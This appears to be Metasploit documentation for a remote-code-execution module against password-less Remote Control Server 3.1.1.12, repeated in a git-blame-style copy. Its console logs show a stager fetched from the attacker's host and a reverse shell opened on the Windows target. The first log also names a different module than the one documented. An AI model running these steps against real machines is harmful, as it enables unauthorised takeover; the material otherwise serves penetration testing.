documentation/modules/exploit/windows/misc/remote_control_collection_rce.md

## Vulnerable Application

This module utilizes the Remote Control Server's, part
of the Remote Control Collection by Steppschuh, protocol
to deploy a payload and run it from the server.  This module will only deploy
a payload if the server is set without a password (default).
Tested against 3.1.1.12, current at the time of module writing

Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
    
## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/remote_control_collection_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Remote Mouse.

## Options

### PATH

The location to write the payload to
Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to `1`.

## Scenarios

###  Remote Control Server 3.1.1.12 on Windows 10

```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 1.1.1.1:1978 - Connecting
[*] 1.1.1.1:1978 - Sending Windows key
[*] 1.1.1.1:1978 - Opening command prompt
[*] 1.1.1.1:1978 - Sending stager
[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
[*] 1.1.1.1:1978 - Server stopped.
[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami 
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```

###  Remote Control Server 3.1.1.12 on Windows 10, with a password

Expected to fail.

```
resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_control_collection.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_control_collection.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_control_collection.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_control_collection_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Connecting and Sending Windows key
[*] Opening command prompt
[*] Sending stager
[*] Using URL: http://2.2.2.2:8080/
[*] Executing payload
[*] Server stopped.
[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
[*] Exploit completed, but no session was created
```
remote control collection rce 2022-09-30 16:49:43 -04:00			`## Vulnerable Application`

			`This module utilizes the Remote Control Server's, part`
			`of the Remote Control Collection by Steppschuh, protocol`
			`to deploy a payload and run it from the server. This module will only deploy`
			`a payload if the server is set without a password (default).`
			`Tested against 3.1.1.12, current at the time of module writing`

			`Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/windows/misc/remote_control_collection_rce`
			4. Set `rhost` and `lhost` as required.
			5. Do: `run`
			`6. You should get a shell as the user who is running Remote Mouse.`

			`## Options`

			`### PATH`

			`The location to write the payload to`
review comments 2022-10-04 20:18:14 -04:00			Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.
remote control collection rce 2022-09-30 16:49:43 -04:00
			`### SLEEP`

			`The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.`
			Defaults to `1`.

			`## Scenarios`

			`### Remote Control Server 3.1.1.12 on Windows 10`

			```
			`resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce`
			`[*] Using configured payload windows/shell/reverse_tcp`
			`resource (remote_mouse.rb)> set rhosts 1.1.1.1`
			`rhosts => 1.1.1.1`
			`resource (remote_mouse.rb)> set lhost 2.2.2.2`
			`lhost => 2.2.2.2`
			`resource (remote_mouse.rb)> set verbose true`
			`verbose => true`
			`msf6 exploit(windows/misc/remote_mouse_rce) > run`

			`[*] Started reverse TCP handler on 2.2.2.2:4444`
			`[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)`
			`[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411`
			`[*] 1.1.1.1:1978 - Connecting`
			`[*] 1.1.1.1:1978 - Sending Windows key`
			`[*] 1.1.1.1:1978 - Opening command prompt`
			`[*] 1.1.1.1:1978 - Sending stager`
			`[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/`
			`[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging`
			`[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging`
			`[*] 1.1.1.1:1978 - Executing payload`
			`[*] Encoded stage with x86/shikata_ga_nai`
			`[*] Sending encoded stage (267 bytes) to 1.1.1.1`
			`[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400`
			`[*] 1.1.1.1:1978 - Server stopped.`
			`[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target`


			`Shell Banner:`
			`Microsoft Windows [Version 10.0.16299.125]`
			`-----`


			`C:\Users\windows>whoami`
			`whoami`
			`win10prolicense\windows`

			`C:\Users\windows>systeminfo`
			`systeminfo`

			`Host Name: WIN10PROLICENSE`
			`OS Name: Microsoft Windows 10 Pro`
			`OS Version: 10.0.16299 N/A Build 16299`
			```

			`### Remote Control Server 3.1.1.12 on Windows 10, with a password`

			`Expected to fail.`

			```
			`resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce`
			`[*] Using configured payload windows/shell/reverse_tcp`
			`resource (remote_control_collection.rb)> set rhosts 1.1.1.1`
			`rhosts => 1.1.1.1`
			`resource (remote_control_collection.rb)> set lhost 2.2.2.2`
			`lhost => 2.2.2.2`
			`resource (remote_control_collection.rb)> set verbose true`
			`verbose => true`
			`msf6 exploit(windows/misc/remote_control_collection_rce) > exploit`

			`[*] Started reverse TCP handler on 2.2.2.2:4444`
			`[*] Connecting and Sending Windows key`
			`[*] Opening command prompt`
			`[*] Sending stager`
			`[*] Using URL: http://2.2.2.2:8080/`
			`[*] Executing payload`
			`[*] Server stopped.`
			`[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target`
			`[*] Exploit completed, but no session was created`
			```